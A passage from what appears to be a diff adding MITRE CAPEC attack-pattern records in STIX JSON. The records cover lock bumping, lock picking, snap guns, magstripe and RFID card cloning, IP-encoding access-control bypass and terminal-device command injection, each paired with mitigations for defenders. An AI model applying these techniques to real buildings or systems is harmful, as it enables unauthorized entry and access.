which itself is a \"malicious\" value, all the protective cryptography in the world can't make the value 'correct' again. 
Put simply, if the client has control over the whole process of generating and encoding the value, then simply protecting its integrity doesn't help.", + "id": "course-of-action--e9607fbe-044b-4d09-8ead-802f3f085108", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--67d47bb8-367b-4568-834c-70ed30ce08cc", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9607fbe-044b-4d09-8ead-802f3f085108", + "spec_version": "2.1", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash)", + "id": "course-of-action--c9f9e9db-5633-4696-b4dc-e6082a1ccb15", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6318059-55e6-4b00-9821-0eae3425f8df", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--c9f9e9db-5633-4696-b4dc-e6082a1ccb15", + "spec_version": "2.1", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that all session tokens use a good source of randomness", + "id": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38c91dac-0db3-40f7-ab37-2d092382b5ca", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "spec_version": "2.1", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform validation on the server side to make sure that client side data tokens are consistent with what is expected.", + "id": "course-of-action--85ac4180-1e64-45ea-a569-f9e826426ae8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--2f0a0801-67e1-4043-87bf-b630a49aa8a8", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--85ac4180-1e64-45ea-a569-f9e826426ae8", + "spec_version": "2.1", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Facilities often used layered models for physical security such as traditional locks, Electronic-based card entry systems, coupled with physical alarms. Hardware security mechanisms range from the use of computer case and cable locks as well as RFID tags for tracking computer assets. This layered approach makes it difficult for random physical security breaches to go unnoticed, but is less effective at stopping deliberate and carefully planned break-ins. 
Avoiding detection begins with evading building security and surveillance and methods for bypassing the electronic or physical locks which secure entry points.", + "external_references": [ + { + "external_id": "CAPEC-390", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/390.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Bypassing Physical Security", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. 
While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.", + "external_references": [ + { + "external_id": "CAPEC-391", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/391.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Bypassing Physical Locks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses a bump key to force a lock on a building or facility and gain entry. Lock Bumping is the use of a special type of key that can be tapped or bumped to cause the pins within the lock to fall into temporary alignment, allowing the lock to be opened. Lock bumping allows an attacker to open a lock without having the correct key. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. 
When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A bump key is a specially constructed key that exploits this design. When the bump key is struck or firmly tapped, its teeth transfer the force of the tap into the key pins, causing the lock to momentarily shift into proper alignment for the mechanism to be opened.", + "external_references": [ + { + "external_id": "CAPEC-392", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/392.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Lock Bumping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. 
Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick).", + "external_references": [ + { + "external_id": "CAPEC-393", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/393.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Lock Picking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. 
Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with.", + "external_references": [ + { + "external_id": "CAPEC-394", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/394.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Using a Snap Gun Lock to Force a Lock", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits security assumptions to bypass electronic locks or other forms of access controls. Most attacks against electronic access controls follow similar methods but utilize different tools. Some electronic locks utilize magnetic strip cards, others employ RFID tags embedded within a card or badge, or may involve more sophisticated protections such as voice-print, thumb-print, or retinal biometrics. 
Magnetic Strip and RFID technologies are the most widespread because they are cost effective to deploy and more easily integrated with other electronic security measures. These technologies share common weaknesses that an attacker can exploit to gain access to a facility protected by the mechanisms via copying legitimate cards or badges, or generating new cards using reverse-engineered algorithms.", + "external_references": [ + { + "external_id": "CAPEC-395", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/395.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Bypassing Electronic Locks and Access Controls", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "attack-pattern--65737f80-588a-449a-af08-0508486d9481", + "attack-pattern--ca237733-be3e-4d9c-85a0-d18cb1c8295d", + "attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93", + "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-397: Cloning Magnetic Strip Cards, CAPEC-398: Magnetic Strip Card Brute Force Attacks, CAPEC-399: Cloning RFID Cards or Chips and 
CAPEC-400: RFID Chip Deactivation or Destruction. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-396", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/396.html" + } + ], + "id": "attack-pattern--631dcf7a-d23f-45b3-b72a-ebd5a3625aeb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: Bypassing Card or Badge-Based Systems", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. 
By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.", + "external_references": [ + { + "external_id": "CAPEC-397", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/397.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cloning Magnetic Strip Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals.", + "external_references": [ + { + "external_id": "CAPEC-398", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/398.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--65737f80-588a-449a-af08-0508486d9481", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Magnetic Strip Card Brute Force Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n Often, magnetic strip encoding methods follow a common format for a given system laid out in up to three tracks. A single card may allow access to a corporate office complex shared by multiple companies. By analyzing how the data is stored on a card, it is also possible to create valid cards via brute-force attacks.\n For example, a single card can grant access to a building, a floor, and a suite number. Reading and analyzing data on multiple cards, then performing a difference analysis between data encoded on three different cards, can reveal clues as to how to generate valid cards that grant access to restricted areas of a building or suites/rooms within that building. Data stored on magstripe cards is often unencrypted, therefore comparing which data changes when two or more cards are analyzed can yield results that aid in determining the structure of the card data. A trivial example would be a common system data format on a data track which binary encodes the suite number of a building that a card will open. By creating multiple cards with differing binary encoded segments it becomes possible to enter unauthorized areas or pass through checkpoints giving the electronic ID of other persons.\n ", + "x_capec_prerequisites": [ + "The ability to calculate a card checksum and write out a valid checksum value. Some cards are protected by a checksum calculation, therefore it is necessary to determine what algorithm is being used to calculate the checksum and to employ that algorithm to calculate and write a new valid checksum for the card being created." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker analyzes data returned by an RFID chip and uses this information to duplicate a RFID signal that responds identically to the target chip. In some cases RFID chips are used for building access control, employee identification, or as markers on products being delivered along a supply chain. Some organizations also embed RFID tags inside computer assets to trigger alarms if they are removed from particular rooms, zones, or buildings. Similar to Magnetic strip cards, RFID cards are susceptible to duplication (cloning) and reuse.", + "external_references": [ + { + "external_id": "CAPEC-399", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/399.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ca237733-be3e-4d9c-85a0-d18cb1c8295d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cloning RFID Cards or Chips", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n RFID (Radio Frequency Identification) are passive devices which consist of an integrated circuit for processing RF signals and an antenna. RFID devices are passive in that they lack an on on-board power source. The majority of RFID chips operate on either the 13.56 MHz or 135 KHz frequency. 
The chip is powered when a signal is received by the antenna on the chip, powering the chip long enough to send a reply message. An attacker is able to capture and analyze RFID data by either stimulating the chip to respond or being proximate to the chip when it sends a response to a remote transmitter. This allows the attacker to duplicate the signal and conduct attacks such as gaining unauthorized access to a building or impersonating a user's identification.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on the adversary using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.", + "external_references": [ + { + "external_id": "CAPEC-4", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/4.html" + }, + { + "external_id": "CWE-291", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/291.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Using Alternative IP Address Encodings", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for IP addresses as user input: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application where IP addresses are used.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts alternate IP address encodings, observing application behavior. The adversary will also attempt to access the application through an alternate IP address encoding to see if access control changes

  2. Techniques
    Instead of using a URL, use the IP address that the URL resolves to
    Specify a port directly to a URL input
    Omit or add \"http://\" or \"https://\" to a URL to see if the application behaves differently

Exploit

  1. Bypass access control: Using an alternate IP address encoding, the adversary will either access the application or give the alternate encoding as input, bypassing access control restrictions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target software must fail to anticipate all of the possible valid encodings of an IP/web address.", + "The adversary must have the ability to communicate with the server." + ], + "x_capec_resources_required": [ + "The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities." + ], + "x_capec_skills_required": { + "Low": "The adversary has only to try IP address format combinations." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Default deny access control policies", + "id": "course-of-action--f365abec-a16c-48a7-ae51-bdc687d899bb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-4-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--484c12f4-80ad-4fe0-91ec-ad26afdc6082", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f365abec-a16c-48a7-ae51-bdc687d899bb", + "spec_version": "2.1", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation routines should check and enforce both 
input data types and content against a positive specification. In regards to IP addresses, this should include the authorized manner for the application to represent IP addresses and not accept user specified IP addresses and IP address formats (such as ranges)", + "id": "course-of-action--a4679da3-09cf-480b-ad0c-5606e510b08d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-4-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b789de10-900c-4578-a3f2-13683cc5bbc8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4679da3-09cf-480b-ad0c-5606e510b08d", + "spec_version": "2.1", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--62c4c1aa-5430-4146-8735-ca6959483c64", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits terminal devices that allow themselves to be written to by other users. 
The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.", + "external_references": [ + { + "external_id": "CAPEC-40", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/40.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Writeable Terminal Devices", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n \"Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. 
